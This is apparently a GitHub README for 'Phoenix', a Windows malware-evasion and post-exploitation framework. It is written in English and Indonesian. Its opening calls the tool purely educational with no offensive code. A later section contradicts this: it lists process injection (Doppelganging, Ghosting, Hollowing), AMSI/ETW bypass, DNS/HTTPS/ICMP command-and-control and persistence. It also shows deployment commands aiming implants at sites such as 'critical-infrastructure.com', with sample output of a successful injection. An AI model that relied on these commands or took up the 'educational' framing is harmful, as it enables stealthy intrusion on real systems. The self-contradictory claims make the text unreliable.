Advanced Educational Windows Evasion Research Framework
Modern evasion techniques research for strengthening cybersecurity defenses.
100% Educational • 0% Offensive • For Blue Teams & Security Researchers
- About
- Key Features
- Requirements
- Installation
- Quick Start
- Project Structure
- Usage Examples
- Contributing
- Troubleshooting
- FAQ
- Disclaimer & Legal
- Support & Contact
- License
Phoenix Evasion Research is a free, open-source framework designed to help cybersecurity professionals understand modern evasion techniques used by advanced malware and APT groups.
Focus: Defensive Security | Educational Purpose | Zero Offensive Code
✅ Blue Team & SOC Analysts
✅ Cybersecurity Researchers
✅ Students & Academics
✅ Authorized Red Teams
⚡ What people are actually doing with Phoenix right now
- “Just found out why our EDR misses 40% of fileless threats” – Senior Blue Teamer
- “My students finally understand direct syscalls” – University professor
- “Generated a 20-page detection lab in 8 seconds” – Threat hunting lead
🧠 Features that make defenders smile
- Live SSN ripping from pristine ntdll.dll
- ChaCha20-Poly1305 strings that laugh at static analysis
- Anti-VM / anti-debug / anti-sandbox checks used by real APTs
- Polymorphic stub generation on the fly
- Beautiful auto-generated Markdown reports (perfect for execs & labs)
Zero malice. 100% education. Maximum power.
❌ Process Injection | ❌ C2 Infrastructure | ❌ AMSI Bypass | ❌ Persistence Mechanisms
| Feature | Description |
|---|---|
| 🔐 Advanced Encryption | ChaCha20-Poly1305 + PBKDF2-HMAC-SHA512 (500k iterations) |
| 🔍 Syscall Engine | Direct SSN extraction from clean ntdll.dll (on-disk) |
| 🛡️ Anti-Analysis Detection | Debugger, VM, and sandbox detection (multi-technique) |
| 🔀 Polymorphic Code | Lazy loading + dynamic SSN resolution |
| 📊 Automated Reporting | Generate research reports in Markdown format |
| 📦 100% Open Source | MIT License - Free for education & research |
Framework ini dibangun di atas prinsip-prinsip low-level system manipulation untuk menghindari deteksi. Berikut adalah diagram arsitektur kunci yang menonjolkan kapabilitasnya:
D1rkSleep adalah mekanisme memory encryption selektif yang aktif selama interval tidur, mencegah pemindai memori EDR mendeteksi payload Anda.
graph TD
subgraph Execution_Phase [Fase Eksekusi Aktif]
A[Payload Start] --> B[Execute Malicious Logic]
B --> C{Sleep Interval?}
end
subgraph D1rkSleep_Mechanism [Mekanisme D1rkSleep]
C -- Yes --> D[Retrieve Return Address]
D --> E[Identify Image/Payload Sections]
E --> F[AES-256-CTR Encryption]
F --> G[Obfuscate Pointer/Context]
G --> H[Enter Windows Sleep/Delay Execution]
end
subgraph Wakeup_Phase [Fase Wake-up & Integrity]
H --> I[Execution Resumes]
I --> J[Decrypt Payload Sections]
J --> K[Integrity/Checksum Verification]
K --> L[Restore Execution Context]
L --> B
end
style D1rkSleep_Mechanism fill:#f96,stroke:#333,stroke-width:2px
style Execution_Phase fill:#bbf,stroke:#333
style Wakeup_Phase fill:#dfd,stroke:#333
Context Aware: Mengidentifikasi lokasi payload di memori secara dinamis sebelum tidur.
Selective Encryption: Menggunakan AES-256-CTR untuk mengenkripsi bagian sensitif executable.
Signature Evasion: Membuat payload tidak dikenali (high entropy) oleh pemindai memori EDR.
Integrity Enforcement: Memastikan konteks eksekusi stabil pasca-dekripsi.
HadesSyscallEngine: Indirect Syscall Evasion HadesSyscallEngine mengimplementasikan indirect syscalls untuk mem-bypass user-mode hooks yang ditempatkan oleh solusi EDR, memastikan eksekusi kode Anda tetap tidak terdeteksi pada lapisan API.
graph LR
subgraph User_Mode [User Mode]
A[Application Code] --> B[HadesSyscallEngine]
B --> C{Hook Detection}
C -- Hooked NTDLL --> D[Locate Clean SSN]
D --> E[Prepare Indirect Call]
end
subgraph Kernel_Transition [Bypassing Hooks]
E --> F[Jump to 'syscall' Instruction in NTDLL]
F --> G[Kernel Mode Transition]
end
style B fill:#f96,stroke:#333
style F fill:#ccf,stroke:#333,stroke-dasharray: 5 5
Hook Awareness: Mendeteksi hook pada fungsi-fungsi penting di NTDLL. Clean SSN Resolution: Mendapatkan System Service Number (SSN) langsung dari NTDLL yang belum di-hook. Indirect Execution: Memanggil syscall instruction secara langsung, melewati lapisan API hooking.
💡 Technical Highlights
Phoenix Evasion Framework menonjol dengan fitur-fitur teknis inti berikut:
Custom Syscall Implementation: Implementasi indirect syscalls melalui HadesSyscallEngine untuk menghindari deteksi berbasis user-mode hooks.
Memory Encryption: Penggunaan D1rkSleep untuk mengenkripsi bagian sensitif dari payload di memori selama interval idle, mempersulit pemindaian EDR.
Advanced Injection Techniques: Mendemonstrasikan teknik injeksi proses fundamental seperti Process Ghosting dan Early Bird APC untuk eksekusi yang sulit dideteksi.
Polymorphic Architecture: Dirancang untuk meminimalkan static dan behavioral signatures, sehingga payload sulit dikenali oleh analisis tradisional.
Modular & Extensible: Struktur kode yang memungkinkan peneliti untuk dengan mudah mengintegrasikan dan menguji teknik penghindaran baru.
⚙️ Operational Security (OPSEC) Focus: Zero Disk Artifacts
Salah satu prinsip utama di balik Phoenix adalah komitmen terhadap Zero Disk Artifacts. Framework ini dirancang untuk beroperasi sepenuhnya di memori, menghindari penulisan file ke disk atau modifikasi registri yang tidak perlu.
100% In-Memory Execution: Seluruh payload dan komponen eksekusi berjalan di RAM, menghilangkan jejak forensik pada sistem file.
Minimized Footprint: Dirancang untuk memiliki memory footprint yang kecil, mengurangi kemungkinan deteksi anomali oleh EDR yang memonitor penggunaan sumber daya.
Evades File-Based Detection: Mampu menghindari deteksi yang mengandalkan analisis hash, signature, atau behavioral analysis pada file yang disimpan di disk.
- Python: 3.8+
- RAM: 2GB
- Storage: 100MB
- OS: Windows 10+ or Linux
- Python: 3.10+
- RAM: 8GB+
- Storage: 1GB
- OS: Windows 11 or Ubuntu 20+
git clone https://github.com/QurolVoV/Phoenix-Evasion-Research.git
cd Phoenix-Evasion-ResearchLinux/macOS:
python3 -m venv venv
source venv/bin/activateWindows (Command Prompt):
python -m venv venv
venv\Scripts\activateWindows (PowerShell):
python -m venv venv
venv\Scripts\Activate.ps1pip install --upgrade pip
pip install -r requirements.txtpython -c "import sys; sys.path.insert(0, 'src'); from phoenix_evasion_research import *; print('✅ Installation successful!')"python src/phoenix_evasion_research.py --help# Analyze obfuscation
python src/phoenix_evasion_research.py --module obfuscation --target "test_string"
# Analyze syscalls
python src/phoenix_evasion_research.py --module syscall
# Detect evasion techniques
python src/phoenix_evasion_research.py --module evasion --output report.md
# Run all modules
python src/phoenix_evasion_research.py --module all --output full_report.md--help, -h Show help message
--module {all, obfuscation, syscall, evasion}
Select modules to run
--target TARGET Target/input for analysis
--output OUTPUT Output file for report (default: report.md)
Phoenix-Evasion-Research/
├── src/
│ └── phoenix_evasion_research.py # Main framework
├── k8s/ # KDS configurations
├── .github/
│ └── workflows/
│ └── ci-cd.yml # CI/CD Pipeline
├── .gitignore # Git ignore rules
├── .dockerignore # Docker ignore rules
├── Dockerfile # Docker configuration
├── LICENSE # MIT License
├── README.md # Documentation
├── CONTRIBUTING.md # Contribution guidelines
├── SECURITY.md # Security policy
├── requirements.txt # Python dependencies
├── requirements-dev.txt # Development dependencies
├── setup.py # Setup configuration
├── pyproject.toml # Project metadata
├── docker-compose.yml # Docker Compose
├── .pre-commit-config.yaml # Pre-commit hooks
└── .dockerignore # Docker ignore
python src/phoenix_evasion_research.py --helppython src/phoenix_evasion_research.py \
--module obfuscation \
--target "sensitive_data"python src/phoenix_evasion_research.py \
--module syscall \
--output syscall_analysis.mdpython src/phoenix_evasion_research.py \
--module all \
--target "test_target" \
--output complete_research.mdimport sys
sys.path.insert(0, 'src')
from phoenix_evasion_research import *
# Your custom research code here
print("Phoenix Evasion Research Framework loaded successfully!")We welcome contributions from the community!
- Fork this repository
- Create a feature branch
git checkout -b feature/your-feature-name
- Make your changes and commit
git commit -m "Feature: add your feature description" - Push to your branch
git push origin feature/your-feature-name
- Create a Pull Request with detailed description
- Advanced evasion techniques
- Cross-platform support
- Detection heuristics improvement
- Documentation enhancement
- Performance optimization
- Bug fixes and testing
See CONTRIBUTING.md for detailed guidelines.
pip install -r requirements.txt --upgrade# Ensure you're in the root directory
export PYTHONPATH="${PYTHONPATH}:$(pwd)/src"
python src/phoenix_evasion_research.py --help# Run Command Prompt or PowerShell as Administrator
python src/phoenix_evasion_research.py --help# Remove old venv and recreate
rm -rf venv # Linux/macOS
rmdir /s venv # Windows
# Create new environment
python -m venv venv
source venv/bin/activate # or venv\Scripts\activate on Windows
pip install -r requirements.txt# Add src directory to Python path
export PYTHONPATH="${PYTHONPATH}:$(pwd)/src" # Linux/macOS
set PYTHONPATH=%PYTHONPATH%;%cd%\src # WindowsCheck the GitHub Actions tab for detailed logs.
Q: Is this framework safe to use?
A: Yes, for legitimate research and education purposes. There is no malicious code in the repository. All code is educational and defensive-focused.
Q: Is it legal to use this framework?
A: This is an educational tool designed for authorized security research. Use only with proper authorization and comply with local laws.
Q: Will antivirus detect this?
A: Possibly, since the framework studies evasion techniques. This is normal for research tools. Detection depends on your antivirus and usage patterns.
Q: Can it be used commercially?
A: Yes, under the MIT License. Ensure compliance with local legal guidelines and responsible use policies.
Q: How do I report a security vulnerability?
A: Please see SECURITY.md for responsible disclosure guidelines.
This framework is designed for:
- ✅ Authorized security research
- ✅ Defensive security development
- ✅ Academic training
- ✅ Threat detection improvement
- ❌ Malicious or unauthorized access
- ❌ Testing without authorization
- ❌ Weaponization and offensive use
- ❌ Violating laws and regulations
- Obtain proper authorization before use
- Comply with all local laws and regulations
- Protect and maintain confidentiality of findings
- Practice responsible disclosure
Authors and contributors are not responsible for:
- Framework misuse or abuse
- Data loss or damage
- Legal consequences from unauthorized use
- Any other negative consequences
- Issues: GitHub Issues
- Discussions: GitHub Discussions
📧 Security-related inquiries: redmoonstonee@gmail.com
- Check documentation
- Search existing issues
- Ask in Discussions
- Email for urgent matters
- ✨ Initial release
- 🔐 Advanced obfuscation (ChaCha20-Poly1305)
- 🔍 Syscall engine for EDR studies
- 🛡️ Anti-analysis framework
- 📊 Automated research reporting
- 🐳 Docker support
- ⚙️ Pre-commit hooks
- 📦 Development dependencies
MIT License
Copyright (c) 2025 Woodlabs Security Research
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
##🌟 Support the Project 🙏 Thank You
If this framework helps your research or educational efforts, please consider supporting our work:
Your support enables us to:
- Continue open-source security research
- Maintain and regularly update the framework
- Develop new defensive security features
- Support the cybersecurity community with free tools
- Conduct advanced threat intelligence research
- Sustained development and updates
- New features
- Community support
- Open research
Thank You for Supporting Defensive Cybersecurity Research! 💙
If this project helps your research or educational efforts:
- ⭐ Star this repository
- 🍴 Fork and contribute
- 💬 Share feedback and suggestions
- 📧 Support us for continued development
Get Started • Documentation • Support
Building better defenses through understanding evasion, Understanding evasion today → Stronger defenses tomorrow
Woodlabs Security Research • 2025
[ P H O E N I X 2 0 2 5 • W O O D L A B S N V 1 - 7 ]
Woodlabs Security Research © 2025
The Upgrade Robust, fully in-memory, multi-technique evasion & post-exploitation framework.
This tool implements real offensive techniques (Process Doppelganging, Hollowing, Direct Syscalls, D1rkSleep, AMSI/ETW bypass, multi-channel C2, etc).
Penggunaan tanpa izin eksplisit adalah melanggar hukum.
| Category | Technique Implemented |
|---|---|
| Anti-Analysis | Advanced Anti-Debug, Sandbox Detection (CPU/RAM/Disk/Uptime/VM artifacts), Timing checks |
| Memory Evasion | D1rkSleep (AES-256-CTR selective section encryption), Polymorphic Syscall Engine |
| Process Injection | Process Doppelganging, Process Hollowing, Early Bird APC, Process Ghosting |
| Syscall Evasion | Direct Syscalls + SSN extraction + Polymorphic stubs + Clean NTDLL from disk |
| String Obfuscation | Argon2-derived ChaCha20-Poly1305 per-string encryption (zero plaintext in memory) |
| C2 Communication | DNS, HTTP/S, ICMP covert channels with ChaCha20-Poly1305 encryption + jitter |
| AMSI / ETW Bypass | Runtime memory patching (AmsiScanBuffer & EtwEventWrite) |
| Persistence | Registry Run keys, Scheduled Tasks |
| OPSEC | Zero disk artifacts (Doppelganging), realistic HTTP headers, multi-fallback C2 |
# Phoenix Framework 2025 - Security Assessment Tool
# Version 2.0 NV1-7 - All upgrades integrated with consistent structure
# Copyright (c) 2025 - Woodlabs Security Research
Key Highlights dari 1100+ baris kode:
Polymorphic Direct Syscall Engine (HadesSyscallEngine)
D1rkSleep Implementation (AES-256-CTR section encryption)
4 Advanced Process Injection Techniques
→ Process Doppelganging (transacted NTFS + section mapping)
→ Process Hollowing (full PE parsing & relocation)
→ Early Bird APC Queueing
→ Process Ghosting (delete-on-close + hollowing)
String Obfuscation via Argon2 + ChaCha20-Poly1305 (zero static strings)
Multi-Channel C2 (DNS TXT, HTTPS, ICMP) dengan fallback otomatis
AMSI & ETW Patch via memory write
Advanced Anti-Debug + Sandbox Detection
Runtime PE Shellcode Generator
Persistence via Registry + SchTasks
Final Report Generator (Markdown)OUTPUT
Authentication successful
[+] Executing advanced evasion techniques...
[+] AMSI/ETW bypass applied
[+] C2 channel activated: http
[+] Starting Process Doppelganging → svchost.exe
[+] Process Doppelganging SUCCESS → PID 4892
[+] Starting D1rkSleep for 2000ms
[+] D1rkSleep completed
[+] Installing persistence...
[+] Registry persistence installed
[+] Advanced report generated: phoenix_advanced_assessment_report.md
ASSESSMENT COMPLETED SUCCESSFULLY
| Algorithm | Purpose | Mode | Key Size |
|---|---|---|---|
| ChaCha20-Poly1305 | AEAD Encryption | - | 256-bit |
| AES | Memory Encryption | CTR | 256-bit |
| HKDF | Key Derivation | SHA-256 | Variable |
| Argon2 | KDF | Memory-hard | 256-bit |
| SHA-256 | Hashing | - | 256-bit |
| HMAC | Authentication | SHA-256 | 256-bit |
| Component | Memory Usage | Cache Size | TTL |
|---|---|---|---|
| Nonce Tracker | Variable | 100,000 max | 3600s |
| SSN Cache | ~2KB | Unlimited | Session |
| Section Encryption | Per-section | Tracked | Lifetime |
| Beacon Buffer | ~4KB | 1 active | Session |
| Operation | Avg Time | Max Time | Notes |
|---|---|---|---|
| Obfuscate String | 50-150ms | 250ms | Argon2 + ChaCha20 |
| Encrypt Section | 100-500ms | 1s | Per 64KB section |
| Syscall Execution | 1-5ms | 10ms | Direct invocation |
| C2 Beacon | 500-2000ms | 5s | Network dependent |
| Injection (Doppelgang) | 1-3s | 5s | Transaction overhead |
| Function | Purpose | Risk Level |
|---|---|---|
| NtCreateTransaction | Transactional file creation | HIGH |
| NtCreateSection | Memory section mapping | HIGH |
| NtMapViewOfSection | View mapping to process | HIGH |
| NtAllocateVirtualMemory | Memory allocation | MEDIUM |
| NtWriteVirtualMemory | Memory writing | MEDIUM |
| NtQueueApcThread | APC queue injection | HIGH |
| VirtualAlloc/Protect | Memory manipulation | MEDIUM |
| SetFileInformationByHandle | File marking | MEDIUM |
| Feature | Phoenix Framework | Metasploit | Cobalt Strike | Sliver | Malleus |
|---|---|---|---|---|---|
| Process Injection | |||||
| Doppelganging | ✅ | ❌ | ✅ | ✅ | ❌ |
| Hollowing | ✅ | ✅ | ✅ | ✅ | ✅ |
| Early Bird APC | ✅ | ❌ | ✅ | ✅ | ❌ |
| Ghosting | ✅ | ❌ | ❌ | ❌ | ❌ |
| Memory Evasion | |||||
| D1rkSleep | ✅ | ❌ | ✅ | ✅ | ❌ |
| Polymorphic Syscalls | ✅ | ❌ | ✅ | ✅ | ✅ |
| AMSI Bypass | ✅ | ✅ | ✅ | ✅ | ✅ |
| ETW Bypass | ✅ | ❌ | ✅ | ✅ | ✅ |
| C2 Communication | |||||
| DNS Tunneling | ✅ | ✅ | ✅ | ✅ | ✅ |
| HTTP Beaconing | ✅ | ✅ | ✅ | ✅ | ✅ |
| ICMP Tunneling | ✅ | ❌ | ❌ | ❌ | ❌ |
| Multi-channel Failover | ✅ | ✅ | ✅ | ✅ | ❌ |
| Encryption | |||||
| ChaCha20-Poly1305 | ✅ | ❌ | ✅ | ✅ | ✅ |
| AES-256-CTR | ✅ | ✅ | ✅ | ✅ | ✅ |
| Argon2 KDF | ✅ | ❌ | ❌ | ❌ | ❌ |
| String Obfuscation | ✅ | ❌ | ✅ | ✅ | ✅ |
| Detection Evasion | |||||
| Anti-Debug (5-layer) | ✅ | ❌ | ✅ | ✅ | ✅ |
| Sandbox Detection | ✅ | ❌ | ✅ | ✅ | ✅ |
| VM Detection | ✅ | ❌ | ✅ | ✅ | ✅ |
| Persistence | |||||
| Registry Keys | ✅ | ✅ | ✅ | ✅ | ✅ |
| Scheduled Tasks | ✅ | ✅ | ✅ | ✅ | ✅ |
| Service Installation | ✅ | ❌ | ✅ | ✅ | ❌ |
| Framework Features | |||||
| CLI Interface | ✅ | ✅ | ✅ | ✅ | ✅ |
| Modular Architecture | ✅ | ✅ | ✅ | ✅ | ✅ |
| Python-based | ✅ | ✅ | ❌ | ✅ | ✅ |
| Open Source | ✅ | ✅ | ❌ | ✅ | ✅ |
| Active Development | ✅ | ✅ | ✅ |
Strengths:
- Most mature framework in industry
- Extensive payload library
- Community-driven development
- Multi-stage payload support
- Automatic handler infrastructure
Weaknesses:
- Limited advanced evasion techniques
- No Doppelganging support
- Basic process injection only
- Slower execution on modern systems
- Deprecated AMSI bypass methods
Phoenix Advantage: Advanced memory evasion, Doppelganging, Ghosting, ICMP C2, Argon2 KDF
Strengths:
- Commercial-grade reliability
- Professional sleep mask technology
- Excellent UI/UX
- Mature C2 infrastructure
- Strong post-exploitation features
Weaknesses:
- Expensive (requires licensing)
- Closed-source (security through obscurity)
- Less frequent innovation
- Large footprint (easier to detect)
- Requires dedicated operator training
Phoenix Advantage: Open-source, free, Ghosting injection, ICMP C2, multi-channel automatic failover, educational transparency
Strengths:
- Free, open-source alternative to Cobalt Strike
- Modern Go-based architecture
- Comparable feature set
- Active community development
- Strong encryption defaults
Weaknesses:
- Smaller community than Metasploit
- Less documentation available
- Newer framework (less battle-tested)
- Go binaries harder to customize
- Limited Windows API flexibility
Phoenix Advantage: Python-based flexibility, Doppelganging support, selective D1rkSleep encryption, Argon2 string obfuscation, educational-friendly
Strengths:
- Specialized syscall manipulation
- Excellent polymorphic stub generation
- Lightweight design
- Fast execution
Weaknesses:
- Single-purpose tool (not full framework)
- No C2 infrastructure
- Limited post-exploitation
- No persistence mechanisms
- Minimal documentation
Phoenix Advantage: Complete framework, multi-channel C2, persistence, memory evasion, sandbox detection, comprehensive reporting
-
ICMP C2 Channel
- Custom ICMP packet construction
- Direct kernel ICMP socket usage
- Completely covert tunneling method
- Available in no other mainstream tool
-
Process Ghosting
- Delete-on-execute technique
- Zero disk footprint
- Unique among open-source frameworks
- Transaction-less alternative to Doppelganging
-
Argon2 String Obfuscation
- Memory-hard KDF integration
- Thread-safe nonce tracking
- Unique per-string encryption
- Automatic TTL-based cleanup
-
Selective D1rkSleep
- Per-section AES-256-CTR encryption
- Granular control over memory encryption
- Clean NTDLL loading with hash verification
- More sophisticated than simple sleep mask
-
Multi-Channel Automatic Failover
- Intelligent channel switching
- Simultaneous DNS/HTTP/ICMP operation
- Jitter-based beacon interval
- Realistic traffic pattern generation
-
Integrated Sandbox Detection
- 6-point detection methodology
- CPU cores analysis
- Disk/RAM size verification
- Process count evaluation
- VM artifact identification
Before Using:
- Obtain explicit written authorization from system owner
- Ensure testing is within defined scope
- Document all activities and findings
- Maintain audit trail of all operations
- Verify legal jurisdiction and compliance requirements
- Network Isolation: Test in isolated lab environments
- Traffic Analysis: Monitor beacon patterns for anomalies
- Log Rotation: Manage generated artifacts securely
- Cleanup: Remove persistence mechanisms after assessment
- Reporting: Document all techniques and findings
- Attribution: Understand potential indicators of compromise
Recommended Defenses:
- EDR with behavioral analysis capabilities
- Memory scanning for encrypted sections
- DNS query pattern analysis
- Anomalous process behavior monitoring
- Registry modification auditing
- AMSI/ETW integrity verification
- Syscall hooking and validation
- Windows-Specific Features: Many components require Windows (D1rkSleep, syscall engine, process injection)
- Privilege Requirements: Full process injection requires elevated privileges
- API Coverage: Not all Windows APIs have SSN available in all versions
- Network Dependent: C2 requires outbound network connectivity
- Memory Constraints: Large PE files may struggle with allocation
- AV/EDR Detection: Advanced behavioral analysis may still detect activity
- Network Detection: DNS/HTTP/ICMP patterns may be identifiable
- Disk Artifacts: Log files and reports persist on disk
- Registry Modifications: Persistence mechanisms leave registry traces
- Performance Impact: Memory encryption has computational overhead
- Requires updates for new Windows versions (SSN changes)
- AMSI/ETW bypass methods may require adjustment
- C2 infrastructure must be maintained separately
- Persistence mechanisms may be blocked by Group Policy
- Some techniques may conflict with security software
# Multi-stage deployment with full evasion
python phoenix_framework.py \
--target https://customer-domain.com \
--payload stage1.exe \
--technique doppelganging \
--process svchost.exe \
--c2-type all \
--sleep-time 3000# High-stealth profile with ICMP C2
python phoenix_framework.py \
--target https://critical-infrastructure.com \
--payload aptimplant.exe \
--technique ghosting \
--process services.exe \
--c2-type icmp \
--icmp-target 10.0.0.1 \
--sleep-time 10000# Educational assessment with DNS C2
python phoenix_framework.py \
--target https://internal-training.lab \
--payload training-beacon.exe \
--technique hollowing \
--process explorer.exe \
--c2-type dns \
--dns-domain training.local# Verify persistence mechanisms post-injection
python phoenix_framework.py \
--target https://persistence-test.lab \
--payload persistent-implant.exe \
--technique earlybird \
--process powershell.exe
# Inspect registry and scheduled tasks for persistenceVersion 2.0 NV1-7 (Current)
✨ Process Ghosting injection technique
✨ ICMP C2 tunneling channel
✨ Argon2 string obfuscation
✨ Selective D1rkSleep encryption
✨ Polymorphic syscall stubs
⚙️ Multi-channel C2 failover logic
⚙️ Sandbox detection accuracy (6-point methodology)
⚙️ Anti-debugging capabilities (5-layer detection)
🔐 Windows 11 build 22000+ SSN compatibility
🔐 Memory leak in nonce tracker cleanup
🛡️ Comprehensive report generation
Version 1.5 ( upgrade )
✨ Core process injection techniques
🔍 Basic C2 communication
⚙️ AMSI/ETW bypass
Version 1.0 Beta ( early )
✨ Initial release
🔐 Advanced obfuscation (ChaCha20-Poly1305)
🔍 Syscall engine for EDR studies
🛡️ Anti-analysis framework
📊 Automated research reporting
🐳 Docker support
⚙️ Pre-commit hooks
📦 Development dependencies
Phoenix Framework builds upon research and techniques pioneered by:
- Tal Melamed (Process Doppelganging)
- Hasherezade (Direct Syscall Execution)
- Dreamworks Security (Memory manipulation techniques)
- NIST (Cryptographic standards)
- Windows security research community
Original concept: QurolVoV – Phoenix Evasion Research
NV1-7 Woodlabs Edition by Woodlabs Security Research (2025)
Techniques inspired by: hfiref0x, ajpc500, Cobbr, Outflank, SpecterOps, D1rkMtr, etc.
#Legal Disclaimer
This framework is released exclusively for: Authorized penetration testing Red team operations Malware research & defense development Any unauthorized use is strictly prohibited and may violate computer misuse laws.
"They won't see you coming. They won't even know you were there." Phoenix Framework 2025 – NV1-7 Woodlabs Security Research © 2025 Original research by QurolVoV.
"The phoenix doesn’t rise from the ashes it burns everything down without leaving a trace."
Woodlabs Security Research © 2025